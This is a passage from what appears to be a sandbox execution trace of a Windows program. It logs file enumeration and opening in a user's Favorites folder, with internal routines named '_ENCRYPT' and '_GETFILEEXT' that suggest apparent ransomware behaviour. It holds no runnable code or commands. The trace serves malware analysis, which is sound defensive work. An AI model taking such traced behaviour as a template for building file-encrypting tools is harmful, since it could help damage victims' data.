wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.138] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 0x7c20c0 [0037.138] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.138] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.138] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.138] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.138] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.138] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.138] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.138] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.138] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.138] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\suggested sites.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.140] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.140] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.140] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.140] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.140] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.140] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.140] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.140] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.140] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.140] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.140] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.140] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 0x7c20c0 [0037.141] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Suggested Sites.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 0x7c20c0 [0037.141] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.141] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.142] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.142] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.142] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.142] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.142] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.142] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.142] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.142] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.142] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.142] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.142] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.143] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.143] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.143] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.143] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.143] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.143] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.143] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.143] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.143] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0x7c20c0 [0037.143] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.143] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.143] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0x7c20c0 [0037.144] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.144] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.144] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.144] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.144] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.144] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.144] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.144] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.144] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.144] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.144] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.144] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.145] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.145] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.145] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.145] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.145] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.145] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.146] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.146] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.146] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.146] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.146] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.146] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.146] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.146] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.146] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.146] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 0x7c20c0 [0037.146] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.146] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.146] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 0x7c20c0 [0037.147] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.147] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.147] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.147] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.147] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.147] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.147] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.147] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.147] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.147] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.147] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.147] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.147] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.148] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.148] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.148] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.148] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.148] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.148] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.148] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.148] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.148] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.148] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rl", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="url", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.148] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".url", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.148] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.148] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 0x7c20c0 [0037.149] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.149] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.149] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x777648, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 0x7c20c0 [0037.149] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.149] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 